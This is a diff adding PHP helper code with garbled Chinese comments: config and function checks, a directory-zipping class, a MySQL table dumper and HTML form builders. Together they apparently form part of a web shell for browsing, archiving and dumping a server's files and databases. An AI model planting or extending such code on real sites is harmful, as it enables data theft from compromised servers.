+
+	// ¼ì²éPHPÅäÖòÎÊý
+	function getphpcfg($varname) {
+		switch($result = get_cfg_var($varname)) {
+			case 0:
+			return "No";
+			break;
+			case 1:
+			return "Yes";
+			break;
+			default:
+			return $result;
+			break;
+		}
+	}
+
+	// ¼ì²éº¯ÊýÇé¿ö
+	function getfun($funName) {
+		return (false !== function_exists($funName)) ? "Yes" : "No";
+	}
+
+	// ѹËõ´ò°üÀà
+	class PHPZip{
+	var $out='';
+		function PHPZip($dir)	{
+    		if (@function_exists('gzcompress'))	{
+				$curdir = getcwd();
+				if (is_array($dir)) $filelist = $dir;
+		        else{
+			        $filelist=$this -> GetFileList($dir);//ÎļþÁбí
+				    foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
+	            }
+		        if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
+				else chdir($curdir);
+				if (count($filelist)>0){
+					foreach($filelist as $filename){
+						if (is_file($filename)){
+							$fd = fopen ($filename, "r");
+							$content = @fread ($fd, filesize ($filename));
+							fclose ($fd);
+						    if (is_array($dir)) $filename = basename($filename);
+							$this -> addFile($content, $filename);
+						}
+					}
+					$this->out = $this -> file();
+					chdir($curdir);
+				}
+				return 1;
+			}
+			else return 0;
+		}
+
+		// »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí
+		function GetFileList($dir){
+			static $a;
+			if (is_dir($dir)) {
+				if ($dh = opendir($dir)) {
+			   		while (($file = readdir($dh)) !== false) {
+						if($file!='.' && $file!='..'){
+            				$f=$dir .'/'. $file;
+            				if(is_dir($f)) $this->GetFileList($f);
+							$a[]=$f;
+	        			}
+					}
+     				closedir($dh);
+    			}
+			}
+			return $a;
+		}
+
+		var $datasec      = array();
+	    var $ctrl_dir     = array();
+		var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+	    var $old_offset   = 0;
+
+		function unix2DosTime($unixtime = 0) {
+	        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+		    if ($timearray['year'] < 1980) {
+				$timearray['year']    = 1980;
+        		$timearray['mon']     = 1;
+	        	$timearray['mday']    = 1;
+		    	$timearray['hours']   = 0;
+				$timearray['minutes'] = 0;
+        		$timearray['seconds'] = 0;
+	        } // end if
+		    return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+			        ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+	    }
+
+		function addFile($data, $name, $time = 0) {
+	        $name     = str_replace('\\', '/', $name);
+
+		    $dtime    = dechex($this->unix2DosTime($time));
+	        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+		              . '\x' . $dtime[4] . $dtime[5]
+			          . '\x' . $dtime[2] . $dtime[3]
+				      . '\x' . $dtime[0] . $dtime[1];
+	        eval('$hexdtime = "' . $hexdtime . '";');
+		    $fr   = "\x50\x4b\x03\x04";
+			$fr   .= "\x14\x00";
+	        $fr   .= "\x00\x00";
+		    $fr   .= "\x08\x00";
+			$fr   .= $hexdtime;
+
+	        $unc_len = strlen($data);
+		    $crc     = crc32($data);
+			$zdata   = gzcompress($data);
+	        $c_len   = strlen($zdata);
+		    $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+			$fr      .= pack('V', $crc);
+	        $fr      .= pack('V', $c_len);
+		    $fr      .= pack('V', $unc_len);
+			$fr      .= pack('v', strlen($name));
+	        $fr      .= pack('v', 0);
+		    $fr      .= $name;
+
+			$fr .= $zdata;
+
+	        $fr .= pack('V', $crc);
+		    $fr .= pack('V', $c_len);
+			$fr .= pack('V', $unc_len);
+
+	        $this -> datasec[] = $fr;
+		    $new_offset        = strlen(implode('', $this->datasec));
+
+			$cdrec = "\x50\x4b\x01\x02";
+	        $cdrec .= "\x00\x00";
+		    $cdrec .= "\x14\x00";
+			$cdrec .= "\x00\x00";
+	        $cdrec .= "\x08\x00";
+		    $cdrec .= $hexdtime;
+			$cdrec .= pack('V', $crc);
+	        $cdrec .= pack('V', $c_len);
+		    $cdrec .= pack('V', $unc_len);
+			$cdrec .= pack('v', strlen($name) );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('v', 0 );
+			$cdrec .= pack('v', 0 );
+	        $cdrec .= pack('v', 0 );
+		    $cdrec .= pack('V', 32 );
+			$cdrec .= pack('V', $this -> old_offset );
+	        $this -> old_offset = $new_offset;
+		    $cdrec .= $name;
+
+			$this -> ctrl_dir[] = $cdrec;
+	    }
+
+		function file() {
+			$data    = implode('', $this -> datasec);
+	        $ctrldir = implode('', $this -> ctrl_dir);
+		    return
+			    $data .
+				$ctrldir .
+	            $this -> eof_ctrl_dir .
+		        pack('v', sizeof($this -> ctrl_dir)) .
+			    pack('v', sizeof($this -> ctrl_dir)) .
+				pack('V', strlen($ctrldir)) .
+	            pack('V', strlen($data)) .
+		        "\x00\x00";
+	    }
+	}
+
+	// ±¸·ÝÊý¾Ý¿â
+	function sqldumptable($table, $fp=0) {
+		$tabledump = "DROP TABLE IF EXISTS $table;\n";
+		$tabledump .= "CREATE TABLE $table (\n";
+
+		$firstfield=1;
+
+		$fields = mysql_query("SHOW FIELDS FROM $table");
+		while ($field = mysql_fetch_array($fields)) {
+			if (!$firstfield) {
+				$tabledump .= ",\n";
+			} else {
+				$firstfield=0;
+			}
+			$tabledump .= "   $field[Field] $field[Type]";
+			if (!empty($field["Default"])) {
+				$tabledump .= " DEFAULT '$field[Default]'";
+			}
+			if ($field['Null'] != "YES") {
+				$tabledump .= " NOT NULL";
+			}
+			if ($field['Extra'] != "") {
+				$tabledump .= " $field[Extra]";
+			}
+		}
+		mysql_free_result($fields);
+	
+		$keys = mysql_query("SHOW KEYS FROM $table");
+		while ($key = mysql_fetch_array($keys)) {
+			$kname=$key['Key_name'];
+			if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
+				$kname="UNIQUE|$kname";
+			}
+			if(!is_array($index[$kname])) {
+				$index[$kname] = array();
+			}
+			$index[$kname][] = $key['Column_name'];
+		}
+		mysql_free_result($keys);
+
+		while(list($kname, $columns) = @each($index)) {
+			$tabledump .= ",\n";
+			$colnames=implode($columns,",");
+
+			if ($kname == "PRIMARY") {
+				$tabledump .= "   PRIMARY KEY ($colnames)";
+			} else {
+				if (substr($kname,0,6) == "UNIQUE") {
+					$kname=substr($kname,7);
+				}
+				$tabledump .= "   KEY $kname ($colnames)";
+			}
+		}
+
+		$tabledump .= "\n);\n\n";
+		if ($fp) {
+			fwrite($fp,$tabledump);
+		} else {
+			echo $tabledump;
+		}
+
+		$rows = mysql_query("SELECT * FROM $table");
+		$numfields = mysql_num_fields($rows);
+		while ($row = mysql_fetch_array($rows)) {
+			$tabledump = "INSERT INTO $table VALUES(";
+
+			$fieldcounter=-1;
+			$firstfield=1;
+			while (++$fieldcounter<$numfields) {
+				if (!$firstfield) {
+					$tabledump.=", ";
+				} else {
+					$firstfield=0;
+				}
+
+				if (!isset($row[$fieldcounter])) {
+					$tabledump .= "NULL";
+				} else {
+					$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
+				}
+			}
+
+			$tabledump .= ");\n";
+
+			if ($fp) {
+				fwrite($fp,$tabledump);
+			} else {
+				echo $tabledump;
+			}
+		}
+		mysql_free_result($rows);
+	}
+
+	class FORMS {
+		function tableheader() {
+			echo "<table width=\"775\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">\n";
+		}
+
+		function headerform($arg=array()) {
+			global $dir;
+			if ($arg[enctype]){
+				$enctype="enctype=\"$arg[enctype]\"";
+			} else {
+				$enctype="";
+			}
+			if (!isset($arg[method])) {
+				$arg[method] = "POST";
+			}
+			if (!isset($arg[action])) {
+				$arg[action] = '';
+			}
+			echo "  <form action=\"".$arg[action]."\" method=\"".$arg[method]."\" $enctype>\n";
+			echo "  <tr>\n";
+			echo "    <td>".$arg[content]."</td>\n";
+			echo "  </tr>\n";
+			echo "  </form>\n";
+		}
+
+		function tdheader($title) {
+			global $dir;
+			echo "  <tr class=\"firstalt\">\n";
+			echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»Ø</a>]</b></td>\n";
+			echo "  </tr>\n";
+		}
+
+		function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') {
+			if ($bgcolor=='2') {
+				$css="secondalt";
+			} elseif ($bgcolor=='1') {
+				$css="firstalt";
+			} else {
+				$css=$bgcolor;
+			}
+			$height = empty($height) ? "" : " height=".$height;
+			$colspan = empty($colspan) ? "" : " colspan=".$colspan;
+			echo "  <tr class=\"".$css."\">\n";
+			echo "	<td align=\"".$align."\"".$height." ".$colspan." ".$extra.">".$content."</td>\n";
+			echo "  </tr>\n";
+		}
+
+		function tablefooter() {
+			echo "</table>\n";
+		}
+
+		function formheader($action='',$title,$target='') {
+			global $dir;
+			$target = empty($target) ? "" : " target=\"".$target."\"";
+			echo " <form action=\"$action\" method=\"POST\"".$target.">\n";
+			echo "  <tr class=\"firstalt\">\n";
+			echo "	<td align=\"center\"><b>".$title." [<a href=\"?dir=".urlencode($dir)."\">·µ»Ø</a>]</b></td>\n";
+			echo "  </tr>\n";
+		}
+
+		function makehidden($name,$value=''){
+			echo "<input type=\"hidden\" name=\"$name\" value=\"$value\">\n";
+		}
+
+		function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){
+			$css = ($css == 'input') ? " class=\"input\"" : "";
+			$input = "<input name=\"$name\" value=\"$value\" type=\"$type\" ".$css." size=\"$size\" $extra>\n";
+			return $input;
+		}
+
+		function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){
+			$textarea = "<textarea name=\"".$name."\" cols=\"".$cols."\" rows=\"".$rows."\" ".$extra.">".$content."</textarea>\n";
+			return $textarea;
+		}
+
+		function formfooter($over='',$height=''){
+			$height = empty($height) ? "" : " height=\"".$height."\"";
+			echo "  <tr class=\"secondalt\">\n";
+			echo "	<td align=\"center\"".$height."><input class=\"input\" type=\"submit\" value=\"È·¶¨\"></td>\n";
+			echo "  </tr>\n";
+			echo " </form>\n";
+			echo $end = empty($over) ? "" : "</table>\n";
+		}
+
+		function makeselect($arg = array()){
+			if ($arg[multiple]==1) {
+				$multiple = " multiple";
+				if ($arg[size]>0) {
+					$size = "size=$arg[size]";
+				}
+			}
+			if ($arg[css]==0) {
+				$css = "class=\"input\"";
+			}
+			$select = "<select $css name=\"$arg[name]\"$multiple $size>\n";
+				if (is_array($arg[option])) {
+					foreach ($arg[option] AS $key=>$value) {
+						if (!is_array($arg[selected])) {
+							if ($arg[selected]==$key) {
+								$select .= "<option value=\"$key\" selected>$value</option>\n";
+							} else {
+								$select .= "<option value=\"$key\">$value</option>\n";
+							}
+
+						} elseif (is_array($arg[selected])) {
+							if ($arg[selected][$key]==1) {
+								$select .= "<option value=\"$key\" selected>$value</option>\n";
+							} else {
+								$select .= "<option value=\"$key\">$value</option>\n";
+							}
+						}
+					}
+				}
+			$select .= "</select>\n";
+			return $select;
+		}
+	}
+?>
\ No newline at end of file